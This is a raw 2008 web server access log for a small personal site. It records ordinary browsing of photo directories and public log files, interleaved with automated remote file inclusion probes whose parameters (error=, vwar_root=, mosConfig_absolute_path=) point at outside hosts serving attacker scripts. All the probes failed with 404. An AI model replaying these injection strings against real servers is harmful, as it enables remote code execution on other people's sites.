213.37.83.253 - - [17/Mar/2008:08:39:37 -0700] "GET /bikes/cb750K6/?N=A HTTP/1.1" 200 1626 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:38 -0700] "GET /bikes/cb750K6/?M=A HTTP/1.1" 200 1626 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
64.72.117.156 - - [17/Mar/2008:08:39:38 -0700] "GET /logs/access_080122.log//errors.php?error=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.117.156 - - [17/Mar/2008:08:39:38 -0700] "GET //errors.php?error=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.72.117.156 - - [17/Mar/2008:08:39:38 -0700] "GET /logs//errors.php?error=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:39 -0700] "GET /bikes/cb750K6/?M=D HTTP/1.1" 200 1626 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:42 -0700] "GET /bikes/cb750K6/?D=A HTTP/1.1" 200 1626 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:43 -0700] "GET /bikes/cb750K6/?A HTTP/1.1" 200 1626 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:45 -0700] "GET /bikes/cb750K6/?D=D HTTP/1.1" 200 1626 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:47 -0700] "GET /bikes/dteel/140CANON/?M=A HTTP/1.1" 200 987 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:50 -0700] "GET /bikes/dteel/EQ2/?M=A HTTP/1.1" 200 841 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:51 -0700] "GET /bikes/dteel/140CANON/?A HTTP/1.1" 200 987 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:51 -0700] "GET /bikes/dteel/EQ2/?M=D HTTP/1.1" 200 841 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
62.101.39.243 - - [17/Mar/2008:08:39:52 -0700] "GET /logs/access_080111.log//war.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.101.39.243 - - [17/Mar/2008:08:39:52 -0700] "GET //war.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.101.39.243 - - [17/Mar/2008:08:39:53 -0700] "GET /logs//war.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.101.39.243 - - [17/Mar/2008:08:39:53 -0700] "GET /logs/access_080201.log//war.php?vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:53 -0700] "GET /bikes/dteel/140CANON/?M=D HTTP/1.1" 200 987 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:54 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/?A HTTP/1.1" 200 8443 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "dmulk.com"
67.228.60.242 - - [17/Mar/2008:08:39:55 -0700] "GET /logs/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
67.228.60.242 - - [17/Mar/2008:08:39:56 -0700] "GET /index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:56 -0700] "GET /bikes/dteel/2008_01_26/?A HTTP/1.1" 200 6616 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
84.14.51.216 - - [17/Mar/2008:08:39:56 -0700] "GET /index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
84.14.51.216 - - [17/Mar/2008:08:39:56 -0700] "GET /logs/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:57 -0700] "GET /bikes/dteel/15JAN08/ HTTP/1.1" 200 710 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:58 -0700] "GET /bikes/dteel/15JAN08/?M=A HTTP/1.1" 200 710 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:39:59 -0700] "GET /bikes/dteel/15JAN08/?M=D HTTP/1.1" 200 710 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:40:00 -0700] "GET /bikes/dteel/15JAN08/?D=A HTTP/1.1" 200 710 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:40:01 -0700] "GET /bikes/dteel/15JAN08/?D=D HTTP/1.1" 200 710 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:40:02 -0700] "GET /bikes/dteel/15JAN08/?A HTTP/1.1" 200 710 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:40:04 -0700] "GET /logs/access_080104.log HTTP/1.1" 200 467398 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:40:08 -0700] "GET /logs/access_071226.log HTTP/1.1" 200 357658 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:40:11 -0700] "GET /logs/access_071001.log HTTP/1.1" 200 33494 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:40:12 -0700] "GET /logs/access_070902.log HTTP/1.1" 200 22717 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:40:14 -0700] "GET /logs/access_070824.log HTTP/1.1" 200 40957 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:40:18 -0700] "GET /logs/access_070630.log HTTP/1.1" 200 36187 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:40:20 -0700] "GET /megumi/earrings/?A HTTP/1.1" 200 2081 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:40:23 -0700] "GET /logs/access_080220.log HTTP/1.1" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:40:24 -0700] "GET /logs/access_070723.log HTTP/1.1" 200 7507 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7" "dmulk.com"
213.37.83.253 - - [17/Mar/2008:08:40:25 -0700] "GET /logs/%22http:/66.218.69.11/search/cache?eUTF-8&p=\"com_thopper\"&u=www.dmulk.com/logs/access_080122.log&w=com_thopper&d=DXqfKHDuQODg&icp=1&.intl=us\">Cached%203E

main.php%20main.phpmain.php%20main.php%20-%20Eurogle%20Network

Eurogle%20Network%20News%20&%20Search%20Engine%20-%20Web%20search%20&%20hourly%20updated%20News%20videos.%20...%20phpmain.php%20main.php%201%2013.html%20components%20com_thopper%20inc%20projectstatus_type.php%20...%20eurogle.com/search/main.php-main.phpmain.php-main.php/1-14.html%20%20-%2021k%20%20-%20%20www.geocities.com/hsia_joe/Tutorial.txt%20%20-%2030k%20%20-%20%20www.geocities.com/hsia_joe/Tutorial.txt%20%20-%2030k%20%20-%20